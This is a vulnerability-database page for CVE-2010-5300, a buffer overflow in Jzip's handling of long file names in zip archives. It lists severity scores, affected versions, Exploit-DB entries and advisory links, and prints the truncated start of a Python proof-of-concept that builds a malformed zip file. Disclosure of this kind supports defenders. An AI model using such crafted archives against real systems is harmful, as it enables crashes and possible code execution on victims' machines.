CVE-2010-5300
published 2014-06-11CVE-2010-5300: Stack-based buffer overflow in Jzip 1.3 through 2.0.0.132900 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
14.62%
96.2th percentile
Stack-based buffer overflow in Jzip 1.3 through 2.0.0.132900 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long file name in a zip archive.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jzip | jzip | — | — |
| jzip | jzip | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Jzip - Buffer Overflow (PoC) (SEH Unicode)
exploitdb·2014-04-16
CVE-2010-5300 Jzip - Buffer Overflow (PoC) (SEH Unicode)
Jzip - Buffer Overflow (PoC) (SEH Unicode)
---
#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import sys, os
filename = "vuln.zip"
buffer = "\x50\x4B\x03\x04\x14\x00\x00"
buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\xe4\x0f"
buffer += "\x00\x00\x00"
eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo += "\x12\x10\x00\x00"
eo += "\x02\x10\x00\x00"
eo += "\x00\x00"
cdf = "\x50\x4B\x01\x02\x14\x00\x14"
cdf +=
Exploit-DB
Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)
exploitdb·2010-04-06
CVE-2010-5300 Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)
Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)
---
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/65041http://packetstormsecurity.com/files/126216/Jzip-2.0.0.132900-Buffer-Overflow.htmlhttp://seclists.org/fulldisclosure/2010/Apr/79http://www.exploit-db.com/exploits/32899https://www.corelan.be/index.php/forum/security-advisories-archive-2010/corelan-10-021-jzip-zip-seh-bofhttp://osvdb.org/show/osvdb/65041http://packetstormsecurity.com/files/126216/Jzip-2.0.0.132900-Buffer-Overflow.htmlhttp://seclists.org/fulldisclosure/2010/Apr/79http://www.exploit-db.com/exploits/32899https://www.corelan.be/index.php/forum/security-advisories-archive-2010/corelan-10-021-jzip-zip-seh-bof
2014-06-11
Published